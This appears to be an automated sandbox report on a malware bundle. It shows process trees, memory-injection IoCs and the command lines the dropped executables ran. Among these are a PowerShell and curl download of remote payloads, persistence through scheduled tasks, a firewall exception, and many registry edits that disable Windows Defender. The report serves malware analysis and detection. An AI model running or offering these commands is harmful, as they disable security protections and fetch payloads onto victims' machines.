Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
792	aspnet_regiis.exe
2760	loader.exe
4036	cmd.exe
3980	AmLzNi.exe
3848	TigerHulk3.exe
3580	Authenticator.exe
1452	DiscordSpotifyBypass.exe
2292	DiscordSpotifyBypass.exe
4756	r.exe
1168	java.exe
988	Client.exe
4372	run2.exe
3140	ev.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 3972	3616	7zFM.exe	86
PID 3616 wrote to memory of 3972	3616	7zFM.exe	86
PID 3616 wrote to memory of 3972	3616	7zFM.exe	86
PID 3972 wrote to memory of 2624	3972	4363463463464363463463463.exe	91
PID 3972 wrote to memory of 2624	3972	4363463463464363463463463.exe	91
PID 3972 wrote to memory of 2624	3972	4363463463464363463463463.exe	91
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 2624 wrote to memory of 792	2624	Armanivenntii_crypted_EASY.exe	93
PID 3972 wrote to memory of 2760	3972	4363463463464363463463463.exe	94
PID 3972 wrote to memory of 2760	3972	4363463463464363463463463.exe	94
PID 2760 wrote to memory of 4036	2760	loader.exe	95
PID 2760 wrote to memory of 4036	2760	loader.exe	95
PID 3972 wrote to memory of 4544	3972	4363463463464363463463463.exe	97
PID 3972 wrote to memory of 4544	3972	4363463463464363463463463.exe	97
PID 3972 wrote to memory of 4544	3972	4363463463464363463463463.exe	97
PID 4036 wrote to memory of 3484	4036	cmd.exe	98
PID 4036 wrote to memory of 3484	4036	cmd.exe	98
PID 3484 wrote to memory of 1100	3484	cmd.exe	99
PID 3484 wrote to memory of 1100	3484	cmd.exe	99
PID 3484 wrote to memory of 2500	3484	cmd.exe	100
PID 3484 wrote to memory of 2500	3484	cmd.exe	100
PID 4036 wrote to memory of 2536	4036	cmd.exe	101
PID 4036 wrote to memory of 2536	4036	cmd.exe	101
PID 3972 wrote to memory of 2872	3972	4363463463464363463463463.exe	102
PID 3972 wrote to memory of 2872	3972	4363463463464363463463463.exe	102
PID 2872 wrote to memory of 3372	2872	Setup.exe	103
PID 2872 wrote to memory of 3372	2872	Setup.exe	103
PID 2872 wrote to memory of 3372	2872	Setup.exe	103
PID 3372 wrote to memory of 3564	3372	svchost.exe	57
PID 4036 wrote to memory of 1612	4036	cmd.exe	104
PID 4036 wrote to memory of 1612	4036	cmd.exe	104
PID 3972 wrote to memory of 3980	3972	4363463463464363463463463.exe	105
PID 3972 wrote to memory of 3980	3972	4363463463464363463463463.exe	105
PID 4544 wrote to memory of 1148	4544	Server.exe	106
PID 4544 wrote to memory of 1148	4544	Server.exe	106
PID 4544 wrote to memory of 1148	4544	Server.exe	106
PID 3980 wrote to memory of 3320	3980	AmLzNi.exe	107
PID 3980 wrote to memory of 3320	3980	AmLzNi.exe	107
PID 3564 wrote to memory of 1168	3564	Explorer.EXE	110
PID 3564 wrote to memory of 1168	3564	Explorer.EXE	110
PID 1168 wrote to memory of 2056	1168	DAB0.tmp.zx.exe	111
PID 1168 wrote to memory of 2056	1168	DAB0.tmp.zx.exe	111
PID 3564 wrote to memory of 3728	3564	Explorer.EXE	112
PID 3564 wrote to memory of 3728	3564	Explorer.EXE	112
PID 3564 wrote to memory of 3728	3564	Explorer.EXE	112
PID 3972 wrote to memory of 3848	3972	4363463463464363463463463.exe	113
PID 3972 wrote to memory of 3848	3972	4363463463464363463463463.exe	113
PID 1148 wrote to memory of 772	1148	server.exe	115
PID 1148 wrote to memory of 772	1148	server.exe	115
PID 1148 wrote to memory of 772	1148	server.exe	115
PID 3972 wrote to memory of 3580	3972	4363463463464363463463463.exe	121
PID 3972 wrote to memory of 3580	3972	4363463463464363463463463.exe	121
PID 3972 wrote to memory of 2272	3972	4363463463464363463463463.exe	122
PID 3972 wrote to memory of 2272	3972	4363463463464363463463463.exe	122
PID 3972 wrote to memory of 2272	3972	4363463463464363463463463.exe	122
PID 3972 wrote to memory of 5100	3972	4363463463464363463463463.exe	123
PID 3972 wrote to memory of 5100	3972	4363463463464363463463463.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	35	curl/8.7.1
HTTP User-Agent header	56	curl/8.7.1

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3564
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3972
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Armanivenntii_crypted_EASY.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Armanivenntii_crypted_EASY.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2624
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:792
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\loader.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2760
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "payload.bat"
        5⤵
        Checks computer location settings
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3484
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_PointingDevice get PNPDeviceID /value
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
        
        C:\Windows\system32\find.exe
        
        find "PNPDeviceID"
        7⤵
        
        PID:2500
      - C:\Windows\system32\curl.exe
        
        curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
        6⤵
        
        PID:2536
      - C:\Windows\system32\curl.exe
        
        curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
        6⤵
        
        PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Server.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4544
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1148
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:772
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Setup.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        5⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\AmLzNi.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\AmLzNi.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3320
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\TigerHulk3.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\TigerHulk3.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetWindowsHookEx
      PID:3848
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Authenticator.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Authenticator.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\nano.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\nano.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:2272
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Java32.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Java32.exe"
      4⤵
      Executes dropped EXE
      PID:5100
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3280
    - - C:\Users\Admin\AppData\Roaming\Programfiles\java.exe
        
        "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1168
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1452
    - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\r.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\r.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4756
    - - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: SetClipboardViewer
        
        PID:4068
      - C:\Users\Admin\AppData\Local\Temp\2855720420.exe
        
        C:\Users\Admin\AppData\Local\Temp\2855720420.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4320
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:2056
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:4416
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:5076
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:904
      - C:\Users\Admin\AppData\Local\Temp\100338673.exe
        
        C:\Users\Admin\AppData\Local\Temp\100338673.exe
        6⤵
        Executes dropped EXE
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\2668931653.exe
        
        C:\Users\Admin\AppData\Local\Temp\2668931653.exe
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        
        PID:2728
      - C:\Users\Admin\AppData\Local\Temp\198243764.exe
        
        C:\Users\Admin\AppData\Local\Temp\198243764.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3732
      - C:\Users\Admin\AppData\Local\Temp\665325503.exe
        
        C:\Users\Admin\AppData\Local\Temp\665325503.exe
        6⤵
        Executes dropped EXE
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\3200919441.exe
        
        C:\Users\Admin\AppData\Local\Temp\3200919441.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ardara.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ardara.exe"
      4⤵
      Executes dropped EXE
      PID:1976
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:988
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4372
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe"
        5⤵
        
        PID:1700
      - C:\Windows\system32\takeown.exe
        
        takeown /F "C:\windows\system32\userinit.exe"
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3356
      - C:\Windows\system32\icacls.exe
        
        icacls "C:\windows\system32\userinit.exe" /grant administrators:F
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2056
      - C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 10
        6⤵
        Delays execution with timeout.exe
        
        PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\test23.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\test23.exe"
      4⤵
      Executes dropped EXE
      PID:556
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ev.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ev.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:3140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4480
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender notification settings
        System Location Discovery: System Language Discovery
        
        PID:3676
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2948
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4612
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3644
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2588
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:960
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1428
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4484
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:4036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:3364
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4136
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1164
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4368
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5004
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4576
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:4816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:540
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2232
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4940
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3552
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3144
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2340
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1096
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2012
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3676
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4604
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2088
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4480
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:3788
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:904
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        6⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2716
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:3660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4736
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:232
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        5⤵
